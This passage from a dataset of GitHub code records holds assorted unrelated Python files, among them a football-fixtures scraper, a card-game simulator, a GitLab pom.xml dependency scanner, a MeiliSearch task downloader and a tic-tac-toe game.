predictor.py","file_ext":"py","file_size_in_byte":6931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"34276101550","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport re\n\n\ndef scores_and_fixtures_df(url: str) -> pd.DataFrame:\n start_url = url\n\n downloaded_html = requests.get(start_url)\n\n soup = BeautifulSoup(downloaded_html.text, features=\"html.parser\")\n\n with open('Premier_League_Score_and_Fixtures_2021-22.html', 'w', encoding='utf-8') as file:\n file.write(soup.prettify())\n\n full_table = soup.select('#sched_11160_1 > tbody')[0]\n # print(full_table)\n table_head = soup.select('#sched_11160_1 > thead')[0]\n # print(table_head)\n\n regex = re.compile('_\\[\\w\\]')\n table_columns = []\n for element in table_head:\n column_label = element.get_text(separator=\" \", strip=True)\n column_label = column_label.replace(' ', '_')\n column_label = regex.sub('', column_label)\n table_columns.append(column_label)\n # print(table_columns)\n table_columns = table_columns[1]\n # print(table_columns)\n table_columns = table_columns.split(\"_\")\n table_columns[12: 14] = [''.join(table_columns[12: 14])]\n # print(table_columns)\n\n table_rows = full_table.select('tr')\n table_data = []\n for index, element in enumerate(table_rows):\n if not element.text.strip():\n continue\n\n row_list = []\n values = element.select('td')\n row_list.append(element.select('th')[0].text.strip())\n for value in values:\n row_list.append(value.text.strip())\n # print(value)\n table_data.append(row_list)\n # print(table_data)\n # table_data.insert(0, table_columns)\n # print(table_data)\n\n df = pd.DataFrame(table_data, columns=table_columns)\n\n pd.set_option(\"display.max_rows\", None, \"display.max_columns\", None)\n\n return df\n","repo_name":"MatthewReddy0/Scraping","sub_path":"scores_and_fixtures.py","file_name":"scores_and_fixtures.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"31062495717","text":"from Curve import Curve\nfrom Deck import Deck\nfrom PerfectDeck import PerfectDeck\nfrom RandomDeck import RandomDeck\nfrom Hand import Hand\nfrom Board import Board\nfrom Creature import Creature\nfrom random import randint\n\n\n\ndef Turn(mana, myBoard, enemyBoard, hand, deck):\n\t#print('-----', mana, '-----')\n\t#print(enemyBoard)\n\t#print(myBoard)\n\t#print(hand)\n\t\n\tcard = deck.TakeRandom()\n\t#print(\"Take card \", card)\n\tif card == None:\n\t\tmyBoard.Overdraw()\n\t\tif myBoard.IsDead():\n\t\t\treturn\n\telse:\n\t\thand.Add(card)\n\n\tmyBoard.Attack(enemyBoard)\n\n\tif enemyBoard.IsDead():\n\t\treturn\n\t\n\tcards = hand.Play(mana)\n\t#print (\"Play cards \", cards)\n\n\t#Creatures my not fit into the board, play heaviest first\n\tcards.sort(reverse=True)\n\tfor c in cards:\n\t\tif not myBoard.AddCreature(Creature(c, c)):\n\t\t\thand.Add(c)\n\t\t\t\n\tmyBoard.CalcTotalTempo()\n\n\t#print(\"***Final state***\")\n\t#print(enemyBoard)\n\t#print(myBoard)\n\t#print(hand)\n\ndef Session(deckA, deckB):\n\tfdeck = deckA\n\tsdeck = deckB\n\t\n\tif randint(0, 1):\n\t\tfdeck, sdeck = sdeck, fdeck\n\t\t\n\tfhand = fdeck.GetHand(3)\n\tshand = sdeck.GetHand(4)\n\tshand.AddCoins(1)\n\t\n\tfboard = Board()\n\tsboard = Board()\n\t\n\tmana = 0\n\tfor i in range(50):\n\t\tmana += 1\n\t\tif mana > 10:\n\t\t\tmana = 10\n\t\t\t\n\t\tTurn(mana, fboard, sboard, fhand, fdeck)\n\n\t\tif fboard.IsDead():\n\t\t\treturn sdeck, sboard.totalTempo\n\t\tif sboard.IsDead():\n\t\t\treturn fdeck, fboard.totalTempo\n\n\t\tTurn(mana, sboard, fboard, shand, sdeck)\n\n\t\tif fboard.IsDead():\n\t\t\treturn sdeck, sboard.totalTempo\n\t\tif sboard.IsDead():\n\t\t\treturn fdeck, fboard.totalTempo\n\t\t\t\t\n\treturn None\n\ndef Evaluate(curveA, curveB, runs):\n\ttotalAWins = 0\n\tfor i in range(runs):\n\t\tdeckA = curveA.GetDeck()\n\t\tdeckB = curveB.GetDeck()\n\t\twinner = Session(deckA, deckB)\n\t\ttotalAWins += int(winner == deckA)\n\n\treturn totalAWins/runs\n\ndef Evaluate2(curve, runs):\n\ttotalAWins = 0\n\tfor i in range(runs):\n\t\tdeckA = curve.GetDeck()\n\t\tdeckB = RandomDeck()\n\t\twinner, totalTempo = Session(deckA, deckB)\n\t\ttotalAWins += int(winner == deckA)\n\n\treturn totalAWins/runs\n\n\t\nif __name__ == '__main__':\n\n\tprint(\"Overdraw\")\n\tmyBoard = Board()\n\tmyBoard.health = 1\n\tenemyBoard = Board()\n\tdeck = Deck([])\n\thand = Hand()\t\n\tTurn(10, myBoard, enemyBoard, hand, deck)\n\tassert(myBoard.health == 0)\n\t\n\t\n\tprint(\"Overpopulate board\")\n\tmyBoard = Board([Creature(1, 1), Creature(1, 1), Creature(1, 1), Creature(1, 1), Creature(1, 1), Creature(1, 1)])\n\tenemyBoard = Board()\n\tdeck = Deck([5, 5, 5, 5, 5, 5])\n\thand = Hand()\n\thand.Add(4)\n\tTurn(10, myBoard, enemyBoard, hand, deck)\n\tassert(len(myBoard.creatures) == 7)\n\tassert(len(hand.cards) == 1)\n\tassert(hand.cards[0] == 4)\n\t\n\tprint(\"Evaluate2 test\")\n\n\tprint(Evaluate2(Curve([2, 0, 9, 7, 7, 5, 0]), 10000))\n\tprint(Evaluate2(Curve([2, 3, 7, 7, 6, 4, 1]), 10000))\n\tprint(Evaluate2(Curve([0, 6, 7, 6, 5, 4, 2]), 10000))\n\tprint(Evaluate2(Curve([30, 0, 0, 0, 0, 0, 0]), 10000))\n\tprint(Evaluate2(Curve([0, 0, 0, 0, 0, 0, 0, 30]), 10000))\n\t\n\n\t\n\n\n\n","repo_name":"barsnadcat/hslab","sub_path":"Session.py","file_name":"Session.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"70044800049","text":"# Chapter 9: Try it Yourself. 9-14: Lottery.\n\nfrom random import randint, choice\nimport string\nimport random\n\n\ni = 0\nj = 0\nlottery_list = []\nlottery_pick = []\n\nwhile i < 10:\n random_no = randint(1, 55)\n lottery_list.append(random_no)\n while i < 5:\n random_ltr = random.choice(string.ascii_uppercase)\n lottery_list.append(random_ltr)\n break\n i += 1\n\nprint(f\"Lottery Machine: {lottery_list}\")\n\nwhile j < 4:\n picked = choice(lottery_list)\n lottery_pick.append(picked)\n j += 1\n\nprint(f\"\\nAny ticket matching with the Lottery Pick: {lottery_pick} wins a prize!\")\n","repo_name":"ceeplusharp/Python_Crash_Course_Examples","sub_path":"pcc_0914_lottery.py","file_name":"pcc_0914_lottery.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23170613890","text":"from enum import Enum\nfrom field_command import FieldCommand\n\nclass Command(Enum):\n DATA = 0\n ADDRESS_LOWER = 1\n ADDRESS_UPPER = 2\n CACHE = 3\n PROTECTION = 4\n ID = 5\n WRITE = 6\n BURST = 7\n SEND = 8\n GET_READY = 9\n GET_DATA = 10\n GET_WRITE = 11\n GET_VALID = 12\n GET_RESPONSE = 13\n GET_ID = 14\n GET_LAST = 15\n CLEAR = 16\n\nclass Burst(Enum):\n FIXED = 0\n INCR = 1\n WRAP = 2\n\nclass HPStimulator(FieldCommand):\n def write(self, id, address, data):\n value = self._read(Command.GET_READY)\n ready = (0b110 & value) == 0b110\n if not ready:\n raise RuntimeError('not ready to write, maybe there are queued\\\n requests')\n\n self._write(Command.WRITE, 1)\n self._write(Command.ID, id)\n self.setAddress(address)\n self._write(Command.DATA, data >> 8)\n self._write(Command.SEND)\n\n def read(self, id, address):\n value = self._read(Command.GET_READY)\n ready = (0b001 & value) == 0b001\n if not ready:\n raise RuntimeError('not ready to read, maybe there are queued\\\n requests')\n\n self._write(Command.WRITE, 0)\n self._write(Command.ID, id)\n self.setAddress(address)\n self._write(Command.SEND)\n\n def setAddress(self, address):\n self._write(Command.ADDRESS_LOWER, address & 0xffffff)\n self._write(Command.ADDRESS_UPPER, (address >> 24) & 0xff)\n\n def setCache(self, cache):\n self._write(Command.CACHE, cache)\n\n def setBurst(self, burst):\n self._write(Command.BURST, burst.value)\n\n def setProtection(self, protection):\n self._write(Command.PROTECTION, protection)\n\n def response(self):\n if self._read(Command.GET_VALID):\n output = {\n \"id\": self._read(Command.GET_ID),\n \"response\": self.responseField(),\n }\n\n if self._read(Command.GET_WRITE):\n output[\"type\"] = \"write\"\n else:\n output[\"type\"] = \"read\"\n output[\"data\"] = self._read(Command.GET_DATA)\n \n self._write(Command.CLEAR)\n return output\n else:\n return None\n\n def responseField(self):\n value = self._read(Command.GET_RESPONSE)\n\n status = {\n 0: \"normal okay\",\n 1: \"exclusive okay\",\n 2: \"slave error\",\n 3: \"decode error\"\n }\n\n cache = \"must write back\" if value & 0b100 else \"okay\"\n shared = \"maybe shared\" if value & 0b1000 else \"unique\"\n\n return f\"{status[value & 0b11]}, {cache}, {shared}\"\n","repo_name":"huntingt/6111-final-project","sub_path":"drivers/hp_stimulator.py","file_name":"hp_stimulator.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41256966083","text":"\"\"\"\n This module is to register useful functions.\n\n\"\"\"\nimport time\nfrom flask import request\n\nfrom api import LOGGER, LOGGER_NAME\nimport api.global_parameters as api_global\n\n\ndef count_unique_visits(base_url: str = '',\n user: str = '') -> None:\n \"\"\"\n Count the unique visit on the website\n\n :param base_url: url to count the visits\n :param user: id of the user\n\n :return: Nothing\n \"\"\"\n\n if base_url in api_global.UNIQUE_URL_VISITS:\n if user not in api_global.UNIQUE_URL_VISITS[base_url]:\n api_global.UNIQUE_URL_VISITS[base_url].append(user)\n else:\n api_global.UNIQUE_URL_VISITS[base_url] = [user]\n\n return\n\n\ndef record_visit() -> (str, str, str):\n \"\"\"\n Function that register who is visit the path\n\n :return: tuple with basic information\n \"\"\"\n\n meth = request.method\n user = request.remote_addr\n base_url = request.base_url\n\n api_global.CHANNEL.basic_publish(\n exchange='',\n routing_key='api_amqp',\n body='{}-{}-{}'.format(user, base_url, meth))\n\n return base_url, meth, user\n\n\ndef record_message(message: str) -> bool:\n \"\"\"\n Function that register who is visit the path\n\n :return: tuple with basic information\n \"\"\"\n\n state = True\n try:\n api_global.CHANNEL.basic_publish(\n exchange='',\n routing_key='api_amqp',\n body=message)\n except Exception as e:\n print(e)\n state = False\n\n return state\n\n\ndef read_logger_visits() -> list:\n \"\"\"\n Read the logger to show the visit history.\n If the file not exists, the function will return\n\n 'No history visit yet'\n\n :return: a list of visits\n \"\"\"\n try:\n\n with open(r'log/{}.log'.format(LOGGER_NAME), 'r') as f:\n lines = f.readlines()\n\n lines = [line for line in lines if ' VISITS: ' in line]\n\n except FileNotFoundError:\n LOGGER.warning('No history visit yet')\n lines = ['No history visit yet']\n\n return lines\n\n\ndef process_management(conn=None) -> None:\n count_time = 0\n\n api_global.define_connection()\n\n time.sleep(1)\n # set_channel_pika(channel_pika)\n\n record_message('Starting process management')\n\n while api_global.STATUS_MANAGEMENT:\n record_message('Doing stuff on process management. Time {}'.format(count_time))\n time.sleep(5)\n count_time += 1\n\n record_message('Finishing process management')\n api_global.CHANNEL.stop_consuming()\n\n return None\n\n\ndef process_channel(\n num_channel: int) -> None:\n count_time = 0\n\n api_global.define_connection()\n\n time.sleep(1)\n\n record_message('Starting process channel {}'.format(num_channel))\n\n while api_global.STATUS_CHANNEL:\n record_message('Doing stuff on process channel {}. '\n 'Time {}'.format(num_channel, count_time))\n time.sleep(1)\n count_time += 1\n\n record_message('Finishing process channel {}'.format(num_channel))\n\n api_global.CHANNEL.stop_consuming()\n\n","repo_name":"AbelGRubio/01-rest-api","sub_path":"api/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"42954974956","text":"\ncalificaciones = dict()\ncalificaciones\n\ncalificaciones['algoritmos'] = 9\ncalificaciones['matematicas'] = 10\ncalificaciones['web'] = 8\ncalificaciones['bases_de_datos'] = 10\ncalificaciones\n\nfor key in calificaciones:\n print(key)\n\nfor value in calificaciones.values():\n print(value)\n\nfor key, value in calificaciones.items():\n print('llave: {}, valor: {}'.format(key, value))\n\n","repo_name":"mijaelrcf/Courses","sub_path":"python-and-django-career/python-course/dictionary_python.py","file_name":"dictionary_python.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"16970726183","text":"import sys, os\n\n\ndef computeAvg(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n sum = 0\n count = 0\n for i in lines:\n sum += float(i)\n count += 1\n print(\"Count: \", count)\n print(\"Sum: \", sum)\n print(\"<===============>\")\n print(\"Avg: \", sum / count)\n return\n\nif __name__ == \"__main__\":\n computeAvg(sys.argv[1])\n \n \n","repo_name":"JHUISI/auto-tools","sub_path":"auto_strong/computeAvg.py","file_name":"computeAvg.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"20"} +{"seq_id":"38345433818","text":"import click\n\n\ndef augmented_task(func):\n func.main = click.command()(func)\n params = func.main.params\n\n for param in params:\n # we only handle option instances (at least for now)\n assert isinstance(param, click.Option)\n\n return func\n","repo_name":"jbeezley/gwdecorators","sub_path":"gwtasks_demo/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21165105908","text":"import pandas as pd\nimport numpy as np\nfrom collections import Counter\nimport os\nfrom config import Config\nconfig = Config()\n\ndef clean_n(item):\n\n if item == r'\\N':return 0\n else: return item\n\ndef load(type_ = 'train'):\n raw = pd.read_csv(config.data_path+ type_+ r'\\\\'+type_+'.csv', sep=',', header=0, index_col=None)\n\n if config.drop_feature:\n dropped = raw.drop(config.drop_feature, axis=1)\n\n dropped = dropped.applymap(clean_n)\n if type_ == 'train':\n label = dropped[config.label_name].values\n x = dropped.drop(config.label_name, 1).values\n # label_counter = Counter(raw['current_service'].values.tolist())\n\n # print(label_counter.most_common())\n\n # check for \\N values\n # tmp = x[:, 4]\n # for i, each in enumerate(tmp):\n # if isinstance(each, str):\n # print(each)\n # print(i)\n # print( each == r'\\N')\n # print( float(each))\n label = process_label(label)\n return x, label\n else:\n x = dropped.values\n user_id = raw['user_id']\n return x, user_id\n\ndef process_label(y):\n counter = Counter(y.tolist())\n\n keys_by_count = [kv[0] for kv in counter.most_common()]\n\n idx = np.arange(len(keys_by_count))\n\n service_2_index = dict(zip(keys_by_count, idx))\n if not os.path.exists(config.out_path+ config.idx_2_service):\n os.mkdir(config.out_path)\n index_2_service = dict(zip(idx, keys_by_count))\n pd.to_pickle(index_2_service, config.out_path+ config.idx_2_service)\n label = np.array([service_2_index[k] for k in y])\n\n return label\n\n\nif __name__ == '__main__':\n load('train')","repo_name":"Stopless-K/china_unicom","sub_path":"data_provider.py","file_name":"data_provider.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"20602411708","text":"# 获取项目列表\n# curl --header \"Authorization: Bearer ${GITLAB_PERSON_AK}\" \"${GITLAB_ORIGIN}/api/v4/projects?pagination=keyset&id_after=0&per_page=100&order_by=id&sort=asc\"\n# 获取文件内容\n# curl --header \"Authorization: Bearer ${GITLAB_PERSON_AK}\" \"${GITLAB_ORIGIN}/tr/sso-api/-/raw/uat/pom.xml\"\n\nimport re\nfrom regex import findLibraryInfo, getDependencyRegex, getParentRegex\nimport requests\n\nimport os\n\nimport numpy\n\nimport aiohttp\nimport asyncio\n\nimport json\n\nfrom prettytable import PrettyTable\n\n\ngitlabPersonAK = os.getenv(\"GITLAB_PERSON_AK\")\ngitlabOrigin = os.getenv(\"GITLAB_ORIGIN\")\n\nid_after = 0\ntable = PrettyTable(['id', 'name', 'project'])\n\nprojectList = []\n\n\nprojectFilePath = \"./git-project.json\"\nif os.path.isfile(projectFilePath):\n fd = open(projectFilePath)\n projectListData = fd.read()\n projectList = json.loads(projectListData)\n fd.close()\nelse:\n while(True):\n response = requests.get(\n gitlabOrigin+\"/api/v4/projects?pagination=keyset&id_after=\"+str(id_after)+\"&per_page=100&order_by=id&sort=asc\", headers={\"Authorization\": \"Bearer \"+gitlabPersonAK})\n list = response.json()\n projectList = projectList+list\n print(\"id_after\", id_after, len(list))\n if len(list) != 100:\n break\n id_after = list[99][\"id\"]\n # for project in list:\n # table.add_row([project[\"id\"], project[\"name\"], project[\"web_url\"]])\n projectListData = json.dumps(projectList)\n fd = open(projectFilePath, \"w+\")\n fd.write(projectListData)\n fd.close()\n # print(table)\n\n\nprint(len(projectList))\n\nprojectData = []\n\n\nasync def fetch(url, sem, project):\n async with sem:\n async with aiohttp.ClientSession() as session:\n async with session.get(url, headers={\"Authorization\": \"Bearer \"+gitlabPersonAK}) as response:\n html = await response.text()\n if response.status != 200:\n return\n projectData.append(\n {\"id\": project[\"id\"], \"name\": project[\"name\"], \"url\": url, \"html\": html})\n\nloop = asyncio.get_event_loop()\nsem = asyncio.Semaphore(100)\n\n\nasync def fetchProject(project, sem):\n await fetch(project[\"web_url\"]+\"/-/raw/uat/pom.xml\", sem, project)\n await fetch(project[\"web_url\"]+\"/-/raw/test/pom.xml\", sem, project)\n await fetch(project[\"web_url\"]+\"/-/raw/master/pom.xml\", sem, project)\n\ntasks = [fetchProject(project, sem)\n for project in projectList]\nloop.run_until_complete(asyncio.wait(tasks))\nloop.close()\n\nfor project in projectData:\n try:\n packageInfo = findLibraryInfo(\n project['html'], 'com.alibaba.cloud', getDependencyRegex)\n if packageInfo == None:\n # print(project[\"id\"], project[\"url\"], 'None')\n continue\n print(project[\"id\"], project[\"url\"], packageInfo[1:3])\n except:\n print(\"发生了异常\", project)\n\n# print(\"====================分界线====================\")\n# for project in projectData:\n# try:\n# packageInfo = findLibraryInfo(\n# project['html'], 'org.springframework.boot', getParentRegex)\n# if packageInfo == None:\n# print(project[\"id\"], project[\"url\"], 'None')\n# continue\n# print(project[\"id\"], project[\"url\"], packageInfo[1:3])\n# except:\n# print(\"发生了异常\", project)\n","repo_name":"mzzya/note","sub_path":"scripts/gitlab/gitlab.py","file_name":"gitlab.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7813880019","text":"import copy\nimport uuid\nfrom datetime import datetime\nfrom TIPCommon import dict_to_flat, add_prefix_to_dict\nfrom SiemplifyUtils import convert_datetime_to_unix_time\nfrom constants import DEVICE_VENDOR, DEVICE_PRODUCT, SEVERITY_MAP, DEVICE_RISK_MAP, DEVICE_STATUS_MAP, \\\n DEVICE_RISK_COLOR_MAP\n\n\nclass BaseModel:\n \"\"\"\n Base model for inheritance\n \"\"\"\n def __init__(self, raw_data):\n self.raw_data = raw_data\n\n def to_json(self):\n return self.raw_data\n\n def to_table(self):\n return dict_to_flat(self.to_json())\n\n def to_enrichment_data(self, prefix=None):\n data = dict_to_flat(self.raw_data)\n return add_prefix_to_dict(data, prefix) if prefix else data\n\n\nclass Alert(BaseModel):\n def __init__(self, raw_data, id, threat_factors, details, severity, timestamp):\n super(Alert, self).__init__(raw_data)\n self.id = id\n self.uuid = uuid.uuid4()\n self.threat_factors = threat_factors\n self.details = details\n self.severity = severity\n self.timestamp = convert_datetime_to_unix_time(datetime.strptime(timestamp, '%m/%d/%Y %H:%M:%S'))\n self.events = []\n\n def get_alert_info(self, alert_info, environment_common, device_product_field):\n alert_info.environment = environment_common.get_environment(self.raw_data)\n alert_info.ticket_id = self.id\n alert_info.display_id = str(self.uuid)\n alert_info.name = self.threat_factors\n alert_info.description = self.details\n alert_info.device_vendor = DEVICE_VENDOR\n alert_info.device_product = self.raw_data.get(device_product_field) or DEVICE_PRODUCT\n alert_info.priority = self.get_siemplify_severity()\n alert_info.rule_generator = self.threat_factors\n alert_info.start_time = self.timestamp\n alert_info.end_time = self.timestamp\n alert_info.events = self.to_events()\n\n return alert_info\n\n def get_siemplify_severity(self):\n return SEVERITY_MAP.get(self.severity, -1)\n\n def set_events(self):\n self.events = [self.to_json()]\n\n def to_events(self):\n return [dict_to_flat(event) for event in self.events]\n\n\nclass Device(BaseModel):\n def __init__(self, raw_data, client_version, device_type, email, last_connection, model, name, number, os_type,\n os_version, risk, status):\n super(Device, self).__init__(raw_data)\n self.raw_data = raw_data\n self.client_version = client_version\n self.device_type = device_type\n self.email = email\n self.last_connection = last_connection\n self.model = model\n self.name = name\n self.number = number\n self.os_type = os_type\n self.os_version = os_version\n self.risk = DEVICE_RISK_MAP.get(risk, \"Unknown\")\n self.status = DEVICE_STATUS_MAP.get(status, \"Unknown\")\n\n def to_json(self):\n json_data = copy.deepcopy(self.raw_data)\n json_data[\"risk\"] = self.risk\n json_data[\"status\"] = self.status\n return json_data\n\n def to_enrichment_data(self, prefix=None):\n data = dict_to_flat({\n \"client_version\": self.client_version,\n \"device_type\": self.device_type,\n \"email\": self.email,\n \"last_connection\": self.last_connection,\n \"model\": self.model,\n \"name\": self.name,\n \"number\": self.number,\n \"os_type\": self.os_type,\n \"os_version\": self.os_version,\n \"risk\": self.risk,\n \"status\": self.status\n })\n\n data = {key: value for key, value in data.items() if value is not None}\n return add_prefix_to_dict(data, prefix) if prefix else data\n\n def to_table(self):\n return self.to_enrichment_data()\n\n def as_insight(self):\n return f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"
\" \\\n f\"

\" \\\n f\"Risk Level: \" \\\n f\"{self.risk}\" \\\n f\"\" \\\n f\"

\" \\\n f\"
\" \\\n f\"

\" \\\n f\" Status: {self.status}\" \\\n f\"

\" \\\n f\"
\" \\\n f\"

\" \\\n f\"Device: {self.device_type}\" \\\n f\"
OS Type:
{self.os_type}\" \\\n f\"
OS Version:
{self.os_version}\" \\\n f\"
Email:
{self.email}\" \\\n f\"
Model:
{self.model}\" \\\n f\"
Number:
{self.number}\" \\\n f\"

\" \\\n","repo_name":"chronicle/tip-marketplace","sub_path":"Integrations/HarmonyMobile/Managers/datamodels.py","file_name":"datamodels.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"38793762844","text":"import requests\nimport os\n\n# Emit error if data directory isn't empty\nif len(os.listdir('data')) != 0:\n raise Exception('Data directory is not empty')\n\n# Create data directory if it doesn't exist\nif not os.path.exists('data'):\n os.makedirs('data')\n\nbase_url = os.environ.get('MEILISEARCH_URL', 'http://localhost:7700')\ntoken = os.environ.get('MEILISEARCH_MASTER_TOKEN', 'masterKey')\n\nprint(f\"Starting using {base_url} with token {token}\")\nlimit = 10000\ncursor = None\ncount = 0\nwhile True:\n file_name = f'data/tasks_{count}.json'\n start_query = f'&from={cursor}' if cursor else ''\n url = f'{base_url}/tasks?limit={limit}{start_query}'\n print(f\"Downloading tasks from {url} into {file_name}\")\n r = requests.get(url, headers={\n 'Accept': 'application/json', 'Authorization': f'Bearer {token}'})\n payload = r.json()\n\n with open(file_name, 'w') as f:\n f.write(r.text)\n\n print(payload)\n\n if payload[\"next\"] == None:\n print(\"Done\")\n break\n\n cursor = payload[\"next\"]\n count += 1\n","repo_name":"nqn/meili_search_backup","sub_path":"download_tasks.py","file_name":"download_tasks.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"9844507396","text":"#-*- coding: utf-8 -*-\nimport os\nimport pandas as pd\nimport config\nimport pandas\nimport re\nimport math\nfrom modules.valuations.valuation import Valuation\n\n\n# 그레이엄 순수\n# 순유동자산-순유동부채 값의 주가대비 60% 기준\n# 하지만 현대사회 특성을 반영해 주가대비 20% 이상적용\nclass Graham(Valuation):\n def __init__(self, valuation):\n data = valuation.get_data()\n json = valuation.get_json()\n\n Valuation.__init__(self, data, json)\n self.set_json('GRAHAM', self.valuate())\n\n def valuate(self):\n try:\n data = self.get_data()\n json = self.get_json()\n\n bps = json['BPS']\n eps_5_growth = json['EPS_5_GROWTH']\n\n # 당좌자산\n # (유동금융자산+매출채권및기타유동채권+기타유동자산+현금및현금성자산+매각예정비유동자산및처분자산집단)*100000000\n quick_assets = (data['FLOATING_FINANCE_ASSETS'].dropna()[:1][0] +\n data['SALES_AND_FLOATING_BOND'].dropna()[:1][0] +\n data['ETC_FLOATING_ASSETS'].dropna()[:1][0] +\n data['CACHE_ASSETS'].dropna()[:1][0] +\n data['RESERVED_SALE_ASSETS'].dropna()[:1][0]) * 100000000\n\n # 재고자산\n # =재고자산*100000000\n inventory_assets = data['INVENTORY_ASSETS'].dropna()[:1][0] * 100000000\n\n # 매출채권\n # =매출채권및기타유동채권*100000000\n sales_bond = data['SALES_AND_FLOATING_BOND'].dropna()[:1][0] * 100000000\n\n # 유동부채\n # 유동부채*100000000\n floating_debt = data['FLOATING_DEBT'].dropna()[:1][0] * 100000000\n\n # 유통주식 수\n stock_count = data['STOCK_COUNT'].dropna()[:1][0] * 1000\n\n # 현재가\n price = data['PRICE'].dropna()[:1][0]\n\n value = (((quick_assets + inventory_assets + sales_bond) - floating_debt)\n / stock_count) / price\n\n return float(value)\n\n except:\n return None\n","repo_name":"jongha/stock-ai","sub_path":"modules/valuations/graham.py","file_name":"graham.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"22409677626","text":"field_size = 3\nfield = [1,2,3,4,5,6,7,8,9]\nx = 0\na = [1,2,3]\n\ndef draw_field():\n\tprint(f\"{'---▼' * field_size}---\")\n\tfor i in range(field_size):\n\t\tprint (f\"►| {field[i * 3]} | {field[1 + i * 3]} | {field[2 + i * 3]} | \")\n\ndef check_winners():\n\n\twin = False\n\n\twin_combo = (\n\t\t(0,1,2), (3,4,5), (6,7,8),\n\t\t(0,3,6), (1,4,7), (2,5,8),\n\t\t(0,4,8), (2,4,6)\n\t)\n\n\tfor pos in win_combo:\n\t\tif (field[pos[0]] == field[pos[1]] and\\\n\t\t\tfield[pos[1]] == field[pos[2]] and\\\n\t\t\tfield[pos[1]] in ('X','O')):\n\t\t\t\twin = field[pos[0]]\n\n\treturn win\n\ndef game_steps(index, char):\n\tif (index > 10 or index < 1 or\\\n\t\tfield[index-1] in ('X','O')):\n\t\t\treturn False\n\n\tfield[index-1] = char\n\treturn True\n\ndef start_game():\n\tcurrent_player = 'X'\n\tstep = 1\n\tdraw_field()\n\twhile (step < 9) and (check_winners() == False):\n\t\tindex = input('Ходит игрок:' + current_player + '. Введите номер поля:\\n')\n\n\t\tif len(index) != 1:\n\t\t\tprint('Введите номер поля')\n\t\t\tcontinue\n\n\t\tif not (index[0].isdigit()):\n\t\t\tprint('Введите число')\n\t\t\tcontinue\n\n\t\tif (game_steps(int(index), current_player)):\n\t\t\tprint('Обновленное поле:')\n\n\t\t\tif (current_player == 'X'):\n\t\t\t\tcurrent_player = 'O'\n\t\t\telse:\n\t\t\t\tcurrent_player = 'X'\n\n\t\t\tdraw_field()\n\t\t\tstep += 1\n\t\telse:\n\t\t\tprint('Поле занято! Повторите!')\n\n\tif (step == 9):\n\t\tprint('Игра оконцена. Ничья!')\n\telse:\n\t\tprint('Выиграл ' + check_winners())\nprint(\"\\n\")\nprint('Право первого хода за игроком (Х)')\nprint('Сделайте первый ход в диапазоне чисел от 1 до 9:')\nstart_game()","repo_name":"MAXHO26/SkillfactoryGame","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3462807887","text":"import tkinter as tk\nimport tkinter.messagebox as mb\n\nmainw = tk.Tk()\nmainw.title(\"Сумма положительных элементов\")\nmainw.geometry(\"250x165\")\n\nbox = tk.Listbox(mainw)\nbox.grid(row=0, column=0, rowspan=4)\n\nentry = tk.Entry(mainw)\nentry.grid(row=0, column=1)\n\nlabel = tk.Label(mainw)\nlabel.grid(row=1, column=1)\n\ndef append_item():\n box.insert('end', int(entry.get()))\n entry.delete(0, 'end')\n\ndef count_sum():\n array = []\n for item in box.get(0, 'end'):\n array.append(item)\n positive = [i for i in array if i > 0]\n summ = 0\n for item in positive:\n summ += (item)\n label['text'] = \"Сумма положительных\\nэлементов списка:\\n\" + str(summ)\n\nbuttonAdd = tk.Button(mainw, text=\"Добавить\", command=append_item)\nbuttonAdd.grid(row=2, column=1)\n\nbuttonCount = tk.Button(mainw, text=\"Посчитать\", command=count_sum)\nbuttonCount.grid(row=3, column=1)\n\nmainw.mainloop()","repo_name":"DMHYT/ComputerScience","sub_path":"10-positivesum.py","file_name":"10-positivesum.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"5823229087","text":"from PyQt5.QtCore import QRectF\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtWidgets import QMenu, QGraphicsView\n\n## Class myview : allow us to override functions from QGraphicsView, for zoom, background and grid.\nclass myview(QGraphicsView):\n def __init__(self, Drawer, gridactivate = False): 